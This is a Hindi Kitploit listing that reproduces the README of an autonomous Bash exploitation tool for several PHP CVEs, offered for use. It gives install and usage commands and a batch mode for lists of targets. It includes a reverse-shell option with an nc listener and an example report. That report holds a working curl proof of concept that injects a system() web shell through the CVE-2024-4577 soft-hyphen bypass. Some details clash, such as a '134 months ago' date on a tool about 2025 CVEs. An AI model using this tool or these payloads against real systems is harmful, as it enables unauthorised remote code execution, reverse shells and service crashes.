Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PHP_8.1.x_Exploit — महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाईपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना और शोषण | Kitploit
उपकरण/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलक्रॉलररिमोट एक्सेस टूल
GitHubgl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

134 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाईपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना और शोषण

रिपॉजिटरी देखें

🚀 PHP CVE ऑटोपायलट

महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाइपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना एवं शोषण

License: GPL v3 Bash

PHP8.1.x_Exploit.sh एक एकल फ़ाइल, शून्य-कॉन्फ़िगरेशन सुरक्षा मूल्यांकन उपकरण है जो स्वचालित रूप से कमजोर PHP एंडपॉइंट खोजता है और PHP संस्करण 8.1.34 से पहले (दिसंबर 2024 में जारी) को प्रभावित करने वाले चार उच्च-प्रभाव वाले CVE का शोषण करता है। इसमें मैन्युअल पेलोड निर्माण की आवश्यकता नहीं है – बस एक URL प्रदान करें और स्क्रिप्ट बाकी काम करती है, क्रॉलिंग से लेकर रिमोट कोड निष्पादन तक। पूर्णतः ऑटोपायलट – बिना उपयोगकर्ता संकेत के स्वचालित रूप से पता लगाता और शोषण करता है।

विशेषताएँ

  • पूर्णतः स्वायत्त ऑटोपायलट – एक एकल URL देने पर, यह बिना उपयोगकर्ता इंटरैक्शन के क्रॉल करता है, फिंगरप्रिंट लेता है, परीक्षण करता है और शोषण करता है।
  • बैच स्कैनिंग – लक्ष्यों की एक सूची खिलाएँ और समानांतर में चलाएँ।
  • उन्नत क्रॉलिंग – बेहतर खोज के लिए होमपेज से लिंक और फ़ॉर्म निकालता है।
  • OS और PHP संस्करण फिंगरप्रिंटिंग – Linux पर Windows-केवल हमलों से बचता है, PHP संस्करण जाँचता है।
  • CVE-2024-4577 बाइपास (Windows CGI तर्क इंजेक्शन)
    • कमजोर PHP-CGI एंडपॉइंट का पता लगाता और शोषण करता है।
    • वैकल्पिक रिवर्स शेल (PowerShell एक-लाइनर)।
    • दो इंजेक्शन स्वाद: सामान्य -d और सॉफ्ट-हाइफ़न %AD बाइपास।
  • CVE-2025-14177 – getimagesize() के माध्यम से हीप मेमोरी लीक
    • गतिशील रूप से एक विकृत JPEG बनाता है और इसे स्वचालित रूप से किसी भी खोजे गए अपलोड एंडपॉइंट पर सबमिट करता है।
    • प्रतिक्रियाओं में लीक हुई मेमोरी का पता लगाता है।
  • RCE के माध्यम से गहन स्थानीय स्कैन (जब CVE-2024-4577 का शोषण किया जाता है)
    • एक हल्का PHP स्कैनर अपलोड करता है जो परीक्षण करता है:
      • CVE-2025-14180 – PDO PostgreSQL में NULL पॉइंटर डीरेफरेंस।
      • CVE-2025-14178 – array_merge में पूर्णांक ओवरफ़्लो।
  • स्मार्ट क्रॉलिंग – CGI स्क्रिप्ट और अपलोड पेज खोजने के लिए लिंक और फ़ॉर्म निकालता है।
  • समानांतर निष्पादन – उपलब्ध होने पर parallel का उपयोग करता है, अन्यथा सुव्यवस्थित रूप से फ़ॉलबैक करता है।
  • वर्बोज़ और डीबग मोड – प्रत्येक HTTP अनुरोध और निर्णय देखें।
  • रिपोर्ट जनरेशन – सभी निष्कर्षों को एक टेक्स्ट फ़ाइल में सहेजें।
  • साफ और सुरक्षित – बाहर निकलने पर अस्थायी फ़ाइलें नष्ट हो जाती हैं, टाइमआउट हैंग होने से रोकता है।

आवश्यकताएँ

रूट विशेषाधिकारों की आवश्यकता नहीं – उपकरण केवल HTTP अनुरोध भेजता है और वैकल्पिक रूप से एक रिवर्स शेल निष्पादित करता है (आपकी मशीन पर लिसनर की आवश्यकता है)।

स्थापना

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

उपयोग

एकल लक्ष्य (सबसे सामान्य)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

रिवर्स शेल के साथ एकल लक्ष्य (CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

फिर आपकी मशीन पर:

root@kitploit:~
nc -lvnp 4444

एकाधिक लक्ष्यों का बैच स्कैन

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

उदाहरण targets.txt:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

केवल-स्कैन मोड (शोषण प्रयास नहीं)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

रिपोर्ट फ़ाइल में सहेजें

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

वर्बोज़ / डीबग आउटपुट

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # बहुत शोरगुल वाला

यह कैसे काम करता है (चरण)

कमांड लाइन विकल्प (पूर्ण संदर्भ)

विस्तार से शामिल CVE

नोट: CVE‑2025‑14180 और CVE‑2025‑14178 का सटीक पता केवल सर्वर के अंदर से (स्थानीय परीक्षण) लगाया जा सकता है। स्क्रिप्ट एक सफल CGI शोषण के बाद एक स्कैनर अपलोड करके इसे प्राप्त करती है।

📸 उदाहरण आउटपुट

root@kitploit:~
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ महत्वपूर्ण चेतावनियाँ और अस्वीकरण

  • ऑटोपायलट मोड – उपकरण बिना संकेत के स्वचालित रूप से कमजोरियों का शोषण करता है। केवल अधिकृत लक्ष्यों पर उपयोग करें।
  • केवल कानूनी उपयोग – यह उपकरण अधिकृत सुरक्षा मूल्यांकन, पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम के विरुद्ध इसका उपयोग करना अधिकांश क्षेत्राधिकारों में अवैध है।
  • कोई वारंटी नहीं – सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के।
  • क्षति की संभावना – शोषण सेवाओं को क्रैश कर सकते हैं (CVE-2025-14180) या मेमोरी दूषित कर सकते हैं (CVE-2025-14178)। स्पष्ट सहमति के बिना उत्पादन प्रणालियों पर न चलाएँ।
  • रिवर्स शेल – --revshell विकल्प लक्ष्य से आपकी मशीन पर एक सॉकेट खोलता है। सुनिश्चित करें कि आपके पास वापस कनेक्ट करने का अधिकार है।
  • लॉगिंग – आपके अनुरोध लक्ष्य के एक्सेस/एरर लॉग में दिखाई देंगे। जिम्मेदारी से उपयोग करें।

🛠️ समस्या निवारण

🤝 योगदान

पुल रिक्वेस्ट, बग रिपोर्ट और फीचर सुझाव का स्वागत है। कृपया अनुसरण करें:

  • स्क्रिप्ट को एकल फ़ाइल और शुद्ध Bash रखें।
  • parallel के साथ और बिना दोनों तरह से परीक्षण करें।
  • इस README को तदनुसार अपडेट करें।

📜 लाइसेंस

GNU जनरल पब्लिक लाइसेंस v3.0 – LICENSE फ़ाइल देखें।

📚 संदर्भ

  • PHP 8.1.34 रिलीज़ घोषणा
  • CVE-2024-4577 विवरण (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • Windows बेस्ट-फ़िट कैरेक्टर मैपिंग

सुरक्षा समुदाय के लिए 🧠 के साथ बनाया गया। नैतिक रूप से उपयोग करें।

टूल डाउनलोड करें
निर्भरताउद्देश्यआमतौर पर स्थापित?
bash 4.0+स्क्रिप्ट इंटरप्रेटरहाँ (Linux/macOS)
curlHTTP अनुरोधहाँ
grep, sed, awkटेक्स्ट प्रोसेसिंगहाँ
mktempअस्थायी फ़ाइल निर्माणहाँ
(वैकल्पिक) parallelतेज़ बैच स्कैनिंगनहीं (लेकिन अनुशंसित)
(वैकल्पिक) jqJSON आउटपुट फ़ॉर्मेटिंगनहीं
चरणक्रिया
1फिंगरप्रिंटिंग – हेडर और प्रोब से OS और PHP संस्करण।
2क्रॉलिंग – होमपेज से href और action विशेषताएँ निकालता है।
3CGI खोज – सामान्य पथ और क्रॉल किए गए लिंक जो CGI जैसे दिखते हैं, आज़माता है।
4CVE‑2024‑4577 परीक्षण – -d और %AD दोनों पेलोड इंजेक्ट करता है; सफल होने पर कमांड निष्पादित करता है या रिवर्स शेल भेजता है।
5अपलोड एंडपॉइंट खोज – सामान्य अपलोड पथ और "upload"/"image" वाले किसी भी फ़ॉर्म की जाँच करता है।
6CVE‑2025‑14177 परीक्षण – एक विकृत JPEG बनाता है, इसे प्रत्येक अपलोड एंडपॉइंट पर POST करता है, हीप लीक का पता लगाता है।
7गहन आंतरिक स्कैन – यदि RCE प्राप्त होता है, तो एक स्कैनर PHP स्क्रिप्ट अपलोड करता है और CVE‑2025‑14180 / CVE‑2025‑14178 का परीक्षण करने के लिए चलाता है।
8रिपोर्टिंग – एक सारांश प्रिंट करता है और वैकल्पिक रूप से फ़ाइल में लिखता है।
विकल्पविवरण
-u URLएकल लक्ष्य URL (जैसे http://example.com/)
-l FILEबैच फ़ाइल जिसमें प्रति पंक्ति एक URL हो
--scan-onlyकेवल पता लगाएँ – शोषण न करें (कोई रिवर्स शेल नहीं, कोई पेलोड अपलोड नहीं)
-o FILEअंतिम रिपोर्ट FILE पर लिखें
--threads Nबैच स्कैनिंग के लिए समानांतर थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--timeout NHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--no-colorरंगीन आउटपुट अक्षम करें
--verboseविस्तृत प्रगति दिखाएँ
--debugप्रत्येक HTTP अनुरोध दिखाएँ (संवेदनशील डेटा उजागर हो सकता है)
--revshell IP PORTCVE‑2024‑4577 मिलने पर रिवर्स शेल का प्रयास करें
-h, --helpसहायता प्रदर्शित करें और बाहर निकलें
CVEगंभीरताप्रभावशोषण वेक्टरसंस्करण में ठीक किया गया
CVE‑2024‑4577 (बाइपास)गंभीरRCEWindows CGI तर्क इंजेक्शन (सॉफ्ट हाइफ़न मैपिंग)PHP 8.1.34
CVE‑2025‑14177मध्यम/उच्चसूचना रिसाव (हीप मेमोरी)getimagesize() को विकृत JPEG पास करनाPHP 8.1.34
CVE‑2025‑14180उच्चDoS (NULL डीरेफरेंस)अनुकरणीय प्रिपेयर + विकृत पैरामीटर \x99 के साथ PDO PostgreSQLPHP 8.1.34
CVE‑2025‑14178उच्च (8.2)DoS / संभावित मेमोरी भ्रष्टाचारविशाल सरणियों के साथ array_merge() जिससे पूर्णांक ओवरफ़्लो होता हैPHP 8.1.34
समस्यासमाधान
curl: command not foundcurl स्थापित करें
GNU parallel not foundअनदेखा किया गया – स्क्रिप्ट इसके बिना काम करती है (धीमी बैच स्कैन)
कोई CGI एंडपॉइंट नहीं मिलालक्ष्य CGI का उपयोग नहीं कर सकता, या यह किसी WAF के पीछे है जो -d फ़्लैग को ब्लॉक करता है
CVE-2024-4577 काम करता है लेकिन रिवर्स शेल विफल रहता हैफ़ायरवॉल जाँचें; --scan-only और मैन्युअल nc लिसनर के साथ एक सरल पेलोड आज़माएँ
इमेज लीक परीक्षण हमेशा "No leak" लौटाता हैअपलोड एंडपॉइंट getimagesize() का उपयोग नहीं कर सकता, या यह बाइनरी डेटा को साफ़ करता है
स्थानीय स्कैनर अपलोड विफल रहता हैवेब रूट लिखने योग्य नहीं हो सकता; स्क्रिप्ट CGI स्क्रिप्ट के समान निर्देशिका में लिखने का प्रयास करती है